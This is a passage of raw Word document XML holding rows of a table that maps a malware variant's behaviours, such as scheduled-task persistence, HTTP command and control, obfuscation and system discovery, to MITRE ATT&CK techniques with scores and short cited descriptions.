          <w:p w14:paraId="2FB8E71D" w14:textId="025F95ED" w:rsidR="004B6EA9" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="004B6EA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>uses RC4 encryption to obfuscate import loading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00173995" w:rsidRPr="00981B9C" w14:paraId="35263561" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4962CA72" w14:textId="7DB2537D" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DFD42CA" w14:textId="279FE546" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="004B6EA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27F8353F" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="781F8115" w14:textId="68AB96EE" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BA8029B" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2778D771" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61EDC983" w14:textId="50CC345C" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A58A105" w14:textId="214C9CCA" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="005C5823" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">2] Scenario 4 - </w:t>
            </w:r>
            <w:r w:rsidR="00173995" w:rsidRPr="00173995">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A scheduled task is used for persistence and execution of the 2nd stage malware</w:t>
            </w:r>
            <w:r w:rsidR="00173995" w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00173995" w:rsidRPr="00981B9C" w14:paraId="6D2BC854" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15DA87C2" w14:textId="71302D59" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004B6EA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B96D5D2" w14:textId="7188F2CA" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="004B6EA9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6495C9E8" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1053.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00981B9C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="616FA36B" w14:textId="0BC53B33" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12DD2D6B" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A242AC7" w14:textId="77777777" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="00173995" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B7244F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6889E404" w14:textId="09FDE196" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CFD517C" w14:textId="08238A42" w:rsidR="00173995" w:rsidRPr="00981B9C" w:rsidRDefault="004B6EA9" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="66D615ED" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FCE1A64" w14:textId="4C016419" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60D7379B" w14:textId="110B98BD" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B7D27E0" w14:textId="73CE2B86" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B6F8BCC" w14:textId="691B519B" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1152FFA2" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38259A42" w14:textId="4768AE1D" w:rsidR="007E7137" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="159B967E" w14:textId="724125C0" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CE92250" w14:textId="12F14773" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidRPr="00A628A8">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This variant also obfuscates Hypertext Transfer Protocol (HTTP) header strings using a custom character manipulation where the certain ranges of characters are modified by either adding or subtracting a constant value 9.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="49193C36" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E140E26" w14:textId="3995AA2C" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226F949C" w14:textId="0093E2CF" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">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632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DA4DF1E" w14:textId="1C9BF03B" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Application Layer Protocol : Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29104F73" w14:textId="73625518" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="648" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71C4C88A" w14:textId="77777777" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="007E7137" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="618" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="254E4734" w14:textId="1E676817" w:rsidR="007E7137" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="470E4D1D" w14:textId="766B76D8" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="0018768B" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AB1265C" w14:textId="1F1C1C12" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00A628A8" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E7137" w:rsidRPr="00646EAA" w14:paraId="7E8E1832" w14:textId="77777777" w:rsidTr="00AE7934">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="498" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6827C493" w14:textId="2F20109F" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1882" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58AD16E3" w14:textId="352901A1" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0353FA5B" w14:textId="77BF8AB9" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1082 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47B81A26" w14:textId="650B4646" w:rsidR="007E7137" w:rsidRPr="00646EAA" w:rsidRDefault="00FD64B4" w:rsidP="00AE7934">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
